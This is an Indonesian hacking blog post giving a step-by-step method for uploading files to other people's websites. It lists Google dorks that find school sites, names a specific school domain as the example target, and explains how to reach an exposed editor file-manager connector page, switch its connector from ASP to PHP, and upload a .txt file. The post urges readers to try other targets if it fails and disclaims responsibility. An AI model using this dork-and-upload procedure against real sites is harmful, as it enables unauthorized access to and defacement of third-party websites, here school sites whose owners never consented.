CMS Belitar Hacking

sebelumnya selamat tahun baru semuanya, dan maaf banget yah gue juga gak tau tekhnik seperti ini apa namanya yang pasti kita bisa upload file kita di web orang tapi inget nich hanya yang berextensi .TXT ... sebenernya ini teknik udah lama banget ane tau tapi baru ane shared di sini ... karna sebelumnya ane gak mau di blog ane ada hacking-hackingan tapi yah apa salahnya .. seperti piso kalo di pakai sama penjahat yahh pasti di pake buat membunuh tapi kalo di pake sama ibu-ibu pasti di pake buat ngiris bawang dan untuk membantu di dapurnya .... intinya sih gmna dari kitanya juga sih ... oke lah tanpa panjang lebar mungkin kalian juga udah gak sabar gmna sih cara pakainya exploit yang sudah usang ini ...


pertama kalian buka google lalu tulislah dork ini di google tersebut :

• inurl:/html/siswa.php?
• inurl:/html/alumni.php?
• inurl:/html/guru.php?

langkah ke dua pilih salah satu site dari google tadi :
contoh :

http://www.sman1serangpanjang.sch.id/html/siswa.php?id=profil

selanjutnya langkah ke tiga, kita masukan exploit kita di target tersebut menjadi :

http://www.sman1serangpanjang.sch.id/editor/filemanager/connectors/test.html

 selanjutnya setelah masuk ganti Connectornya ASP menjadi PHP :

setelah itu upload file .txt kamu inget hanya file .txt yang bisa.

setelah selesai di upload dimana tempat filenya kita tadi itu mudah langsung saja kita masukan

userfiles/file/namafilekamu.txt

 contoh :

http://www.sman1serangpanjang.sch.id/userfiles/file/namafilekamu.txt

 selesai dan jadi deh .. gmna berhasil gak .. kalo gak berhasil coba cari target yang lain ... inget semua yang kamu lakukan kami tidak bertanggung jawab ... sampai jumpa lain waktu